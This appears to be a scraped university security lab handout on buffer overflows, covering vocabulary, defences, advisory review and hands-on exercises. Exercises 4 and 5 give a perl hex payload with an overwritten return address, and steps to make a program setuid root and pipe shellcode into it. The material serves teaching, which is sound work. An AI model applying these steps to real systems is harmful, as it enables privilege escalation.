• No results found

Lab8_buffer_overflow.doc

N/A
N/A
Info
Download
Protected

Academic year: 2020

Share "Lab8_buffer_overflow.doc"

Copied!
10
0
0

Loading.... (view fulltext now)

Download now ( 10 Page )

Full text

(1)

Security Lab 8: Buffer Overflow

Name:

Date:

Introduction

Buffer overflows represent a significant security threat to systems. This lab organizes resources and exercises to help students understand buffer

overflows and the countermeasures used against them. Vocabulary Review

Buffer Overflow: A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system. Also known as buffer overruns.

Stack Buffer Overflow: A buffer overflow that affects a buffer located on the stack, usually as a local variable in a function’s stack frame. This is also referred to as stack smashing.

Stack Frame: A structure saved on the stack that stores the return address, parameters, local variables, and registers associated with a function.

Shellcode: code supplied by the attacker and often saved in the buffer being overflowed. Traditionally, its function was to transfer control to a user command-line interpreter, or shell, which gave access to any program available on the system with the privileges of the attacked program.

NOP sled: A technique used to deal with the inability to precisely determine the starting address of the shellcode in memory. The attacker pads the shellcode with NOP (no operation) instructions and places the actual content of the shellcode at the end of the buffer. No matter where in the NOP sled the actual target address is, the computer will run through the remaining NOPs, doing nothing, until it reaches the start of the real

(2)

Compile-Time Defenses: Compile-time defenses aim to prevent or detect buffer overflows by instrumenting programs when they are compiled. The following examples are all compile-time defenses against buffer overflows:

1) Develop software in a high-level language that does not permit buffer overflows.

2) Use safe coding techniques such as bounds checking 3) Use safe libraries

4) Use stack protection mechanisms like Stackguard (canary)

The disadvantage of all of these techniques is that they require code to be recompiled.

Run-Time Defenses: Run-time defenses aim to detect and abort attacks in existing programs. These defenses involve changes to the memory

management of the virtual address space of processes. The following examples are all run-time defenses against buffer overflows:

1) Executable address space protection – tag pages in virtual memory as being non-executable

2) Address space randomization

3) Guard pages separate critical regions of memory

The disadvantages of these techniques include hardware support problems and compiler support problems.

Defensive Programming: a form of defensive design intended to ensure the continuing function of a piece of software in spite of unforeseeable usage of said software. Also known as secure programming.

Injection Attack: a wide variety of program flaws related to invalid handling of input data.

Command Injection: an injection attack that constructs a command subsequently executed by the system with the privileges of the Web server.

(3)

Code Injection: an injection attack that includes code that is then executed by the attacked system.

Cross-site Scripting(XSS): a vulnerability that concerns input provided to a program by one user that is subsequently output to another user. The vulnerability involves the inclusion of script code in the HTML content of a Web page displayed by a user’s browser. XSS attacks illustrate a failure to handle both program input and program output correctly.

Fuzzing: a software testing technique that uses randomly generated data as inputs to a program.

Race Condition: when multiple processes and threads compete to gain uncontrolled access to some resource.

Deadlock: when an incorrect sequence of synchronization primitives results in processes waiting indefinitely for resources held by other processes.

Memory Leak: when a program fails to manage memory effectively, the available memory on the heap may steadily reduce until it is completely exhausted.

Environment Variables: a collection of string values inherited by each process from its parent that can affect the way a running process behaves. The PATH environment variable is an important example.

Privilege Escalation: when an attacker is able to execute code with the privileges and access rights of a compromised program or service that has privileges greater than those already available to the attacker.

Least Privilege: programs should execute with the least amount of privileges needed to complete their function.

(4)

The Shortest C Primer in the World

In order to complete the buffer overflow exercises, we must use the C programming language. For the most part, you will not have to type the programs yourself, but you will have to compile and run them. This primer aims to provide you with the bare minimum you need to compile and run C programs on your linux workstation.

Compiling C Source Code

Compiling C Source is fairly straight-forward. If you have a C source file called HelloWorld.c, then you will simply type:

cc -o HelloWorld HelloWorld.c

This command will produce a file named HelloWorld that is simply the compiled version of your source code file.

Running Compiled C Code

In order to run the HelloWorld program, simply type:

./HelloWorld

Unix Commands for Program Execution

In order to recreate some of these security scenarios, we will need to alter file permissions and ownership in the linux filesystem.

chmod changes the permissions of file

chmod 4755 buffer4

chown changes the owner of a file

(5)

Exercise 1: Finding Vulnerable Applications

All applications have vulnerabilities. These vulnerabilities are generally reported publicly via government and public agencies, private security groups, and vendors. Take five minutes to review the vulnerabilities listed on these Websites. In the space below, list and identify the different types of vulnerabilities revealed on the Websites.

US - Computer Emergency Readiness Team Website: http://www.us-cert.gov/cas/techalerts/index.html

Microsoft Security Advisory Website:

http://www.microsoft.com/technet/security/advisory/default.mspx

SysAdmin, Audit, Network, Security (SANS) http://www.sans.org/top25errors/

List examples of the vulnerabilities found below.

(6)

Exercise 2: Reading Bug Reports

The advisories reviewed above almost always eventually point to bug reports that identify the specific causes of errors. We will consider two different bug reports in this exercise: an open source report and a report for proprietary software.

Mozilla Bug Report:

https://bugzilla.mozilla.org/show_bug.cgi?id=485217

What was the problem encountered in the software? Was the problem the result of programmer error? Microsoft Bug Report:

http://www.microsoft.com/technet/security/bulletin/MS09-013.mspx What was the problem encountered in the software?

Was the problem the result of programmer error?

Compare the two bug reports. How do they compare in transparency, quality of information, and clarity?

(7)

Exercise 3: Buffer Overflow Example

1) Compile buffer1.c

cc -o buffer1 buffer1.c

What warning messages does the compiler produce?

2) Run buffer1 from the command line ./buffer1

3) The buffer1 program will accept two Strings from the user and compare these Strings. If the Strings are equal the program returns 1, else it returns 0. Enter the word start for both input Strings. Does the program return the correct result?

Enter the word start for the first String and end for the second String. Does the program return the correct result?

4) The buffer1 program only accepts Strings of 8 characters. The buffer overflow occurs when we enter Strings longer than 8 characters.

Enter the word start for the first String and the phrase badinputbadinput for the second String.

Does the program return the correct result? If not, why not?

5) Enter the start for the first String and the phrase evilinputevilinput for the second String.

(8)

Exercise 4: Stack Overflow Examples

1) Compile buffer2.c

cc -o buffer2 buffer2.c

2) Run the buffer2 program ./buffer2

3) Enter a short name like jason What does the program do?

4) Enter a long String like XXXXXXXXXXXXXXXXXXXXXXXX (32 Xs)

What does the program do? 5) Pipe a perl program into buffer2. perl -e 'print pack(“H*”,

“41424344454647485152535455565758616263646566676808 fcffbf948304080a4e4e4e4e4e0a”);' | ./buffer2

(9)

Exercise 5: Stack Overflow Attack

1) Compile buffer4.c

cc -o buffer4 buffer4.c

2) Change the owner of buffer4 program to root sudo chown root buffer4

3) Run the following command to make buffer4 a setuid program that runs as root.

sudo chmod 4755 buffer4

4) Review the shellcode contained in attack1 cat ./attack1

5) Type the following command to execute the attack: ./attack1 | ./buffer4

(10)

Discussion

What do buffer overflows and software errors in general say about the role of maintenance in software security?

Conclusion

This lab outlined some basic experiments with buffer overflows. Programming errors are a significant threat to high-quality secure IT systems.

Resources

http://www.us-cert.gov/cas/techalerts/index.html

http://www.microsoft.com/technet/security/advisory/default.mspx

https://bugzilla.mozilla.org/show_bug.cgi?id=485217

http://www.sans.org/top25errors/

References

Download now ( DOC - 10 Page - 45.00 KB )

Related documents

Occupational change and wage inequality: European Jobs Monitor 2017*

The goal is to show how the service change defined in the quintile structure interconnects with development of other dimensions of the labour market, like the growing share of

A Phenomenological Study of Middle School Teachers’ Implementation of Formative Assessment Practices in A Semi-Rural Northwest Georgia District

Formative Assessment Practices - Formative assessment practices are generally defined as those assessment practices used by teachers as assessments for learning—a learning

The Lee Kong Chian School of Business Academic Year 2015 /16 Term 1

This is followed by a detailed review of the structure, sale, delivery and distribution of the main spectrum of consumer banking products such as credit cards,

Counselors GROUP. IMPACT The District of Columbia Public Schools Effectiveness Assessment System for School-Based Personnel

Individual meets Level 3 expectations AND extends impact by finding new and innovative ways to help the Special Education and English Language Learner programs, the

Brookings Active Surveillance Implementation Council Meeting #2. Participant Biographies

Nussbaum has served as president of the Disease Management Association of America, chairman of the National Committee for Quality Health Care, chair of America's Health

Characterization of the conformational states of phospholamban and their roles in regulation of SR Calcium-ATPase

Chapter 5 - Probing Ground and Excited States of Phospholamban in Model and Native Lipid Membranes by Magic Angle Spinning NMR Spectroscopy Figure 1. Conformational equilibria

CRIMINAL HISTORY ENHANCEMENTS SOURCEBOOK

Each chapter of the Sourcebook summarizes existing arrangements across eighteen jurisdictions and highlights some critical issues for consideration. The information is intended to

Back_to_Basics_Openings.pdf

In the opening, the center is the most important part of the board.. opening lines for the bishops on f1 and fE. This is quite elementary, so let us return to the